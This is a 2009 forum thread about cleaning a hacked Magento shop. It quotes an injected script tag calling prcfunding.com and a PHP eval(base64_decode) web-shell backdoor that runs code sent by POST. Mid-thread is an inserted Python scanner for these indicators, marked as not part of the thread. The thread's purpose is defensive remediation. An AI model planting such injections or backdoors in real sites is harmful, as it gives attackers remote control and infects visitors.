Please help! someone put a script on my page
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

Hi there, someone put a script code on my page and I don't know how to find it. It loads another webpage (prcfunding.com). Here is the code:

<script type="text/javascript">var Translator = new Translate([]);</script>
<!-- START silver-widget -->
<script type="text/javascript" src="http://www.mywebsite.co.uk/skin/frontend/default/puretheme/gallerywidget/swfobject.js"></script>
<!-- END silver-widget --></head><script src=http://prcfunding.com/pages/desktop.php ></script>
<body class=" catalog-category-view categorypath-for-him-html category-personalised-gifts-for-him">

<!-- Remove before production -->
<!-- End Remove -->

<div class="wrapper">
<!-- start header -->
<div class="header">

<div class="header-top-container">
<div class="header-top">

 
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

I searched the database and files, and the script code was in the Google and Yahoo site verification files (html).

I deleted them but I can still see the script in the source code. Any ideas?

Thanks

 
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hi there Ali,

The same problem happened to me yesterday; I found your post from Google.

I don't know how he could enter or what he wants!!!

I can give you some tips to protect your site, listen:

1- Disable the PHP function base64_decode on your server, or ask the server admin to do that.
2- Change your login password.
3- Check your site files: delete what he created and replace the changed files.

 
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 
alaa462 - 10 November 2009 09:21 AM

Hi there Ali,

The same problem happened to me yesterday; I found your post from Google.

I don't know how he could enter or what he wants!!!

I can give you some tips to protect your site, listen:

1- Disable the PHP function base64_decode on your server, or ask the server admin to do that.
2- Change your login password.
3- Check your site files: delete what he created and replace the changed files.

Hi Alaa,

The thing is, I downloaded my files (so this overwrote the logs) from the server, so the host cannot find from the logs which files he or she created or edited. We found 5 index.php files edited. They added some code to the beginning of the files, but we don't know which others were edited or created.

Can you advise or tell me which files they edited or created with you?

What happens if I disable the PHP function base64_decode? Any effects on functionality?

Is the database clean?

thanks

 
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hi again,

The hacker has added some PHP code in some files so that it could edit the other files automatically.

First he created a new file called “gifimg.php” in my images folder, and I figure the file was the reason the other files were edited,

and he added code to my php, html and js files. He used the function base64_decode in his script; he didn't play with the database.

So if you don't want his script to create or edit your files automatically: disable the function and replace the modified files with the original files, or delete it all and upload it again if you have a full backup.

Actually I don't know how he could do that!!! My site is really secure and has been online for 1 month only!!!

 
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

By the way, try to search for code like this one:

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
 
 
alaa462
Jr. Member
 
Total Posts:  4
Joined:  2009-11-10
 

Hey Ali, I did a search for that problem and I can say it's like a virus.

I got this resolution for you:

1) First you need to repair all the affected files with unaffected/original/backup files. You can filter those files by looking at the file details (last created/edited); usually the latest created/edited are the affected files (view the file's code to confirm).
Make sure you scan your backup files with the latest antivirus (recommend avast as iframe remover).

2) Once all the files have been recovered, temporarily disable your server's FTP.

3) Then it's time for you to change all your account/server/FTP passwords to strong new ones.

4) Enable your FTP server and set it to use only 1 connection per session, and disable the FTP monitoring too.

5) Disable your FTP server again and only enable it when you want to use FTP on your end.

The original link:
http://www.scammeralert.info/website-hacked-attack-by-iframe-and-index-php-gifimg-php-base64_decode/
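
Added example, not part of the thread or any poster's code: a read-only Python scan for the indicators described in the posts above (the eval(base64_decode('...')) wrapper, a script tag placed right after </head>, PHP files in image folders), with the modification-time filter from step 1. The directory names in IMAGE_DIRS, the sample tree and the host injected.example are constructed assumptions.

```python
import base64, os, pathlib, re, tempfile
# Indicators from the thread: eval(base64_decode('<literal>')) and a <script src> right after </head>
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
STRAY_SCRIPT = re.compile(rb"</head>\s*<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IMAGE_DIRS = {"images", "media"}  # assumption: directories that should hold no PHP
TEXT_EXT = (".php", ".phtml", ".html", ".htm", ".js")

def scan_tree(root, modified_since=None):
    """Return sorted (relative_path, reason, detail) tuples; nothing found is executed."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower().endswith(".php") and IMAGE_DIRS & set(rel.lower().split("/")[:-1]):
                findings.append((rel, "php-in-image-dir", ""))
            if modified_since is not None and os.path.getmtime(path) >= modified_since:
                findings.append((rel, "recently-modified", ""))
            if not name.lower().endswith(TEXT_EXT):
                continue
            data = pathlib.Path(path).read_bytes()
            for m in EVAL_B64.finditer(data):
                try:  # decode for triage only
                    detail = base64.b64decode(m.group(1), validate=True).decode("latin-1")
                except ValueError:
                    detail = "<undecodable>"
                findings.append((rel, "eval-base64", detail[:120]))
            for m in STRAY_SCRIPT.finditer(data):
                findings.append((rel, "script-after-head", m.group(1).decode("latin-1")))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: three tampered files (mtime 2000) and one clean (mtime 1000)."""
    blob = base64.b64encode(b"echo 'constructed sample';").decode()
    files = {
        "index.php": "<?php eval(base64_decode('%s'));?>\n<?php echo 'shop';" % blob,
        "media/images/gifimg.php": "<?php /* constructed placeholder */",
        "page.html": "<head></head><script src=http://injected.example/x.js ></script><body>",
        "clean.php": "<?php echo base64_decode('aGk='); // decoded, not passed to eval",
    }
    for rel, text in files.items():
        path = pathlib.Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text)
        os.utime(path, (1000, 1000) if rel == "clean.php" else (2000, 2000))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_tree(tmp, modified_since=1500), sep="\n")
```

Modification times are reset when files are re-uploaded, so the recently-modified reason is only a hint; the content matches do not depend on timestamps.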

 
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

Yes, they created files in my image folders too. I got rid of them. But as I uploaded my backup files just after being infected, I don't know which other files they edited or created and can't find it easily. So I think I should just delete everything and reinstall Magento and use the old database.

Any thoughts on this or suggestions?

Any more info on how they hacked? If it is through my PC I have to reformat my PC, as avast doesn't detect anything. I scanned twice.

thanks

 
 
ecommerce glasgow
Jr. Member
 
Total Posts:  7
Joined:  2009-01-18
 

Hi mate

Most hacks are done via insecure FTP info, such as username www.yourdomain and password myonlineshop, scotlandshop, anything that can be cracked via brute force.

What is brute force? It's when an app tries to guess a password using a password file. To give you an example, I have heard people can buy a password file, a simple .txt file that's 30 gig in size, with millions of passwords.

Once they get the password they would create a backdoor in, just in case you change your password, but this is not always possible.

Change your FTP to something crazy like “323£!ZAd_%”

This will help. Also back up your site and scan offline.

It's a pain,

 
 
Shahil
Member
 
Total Posts:  36
Joined:  2008-05-19
 

SFTP is also helpful to prevent such attacks. It will be better to use SFTP instead of FTP. If possible, remove write permission on the main index.php so that no one will be able to write to that file.

 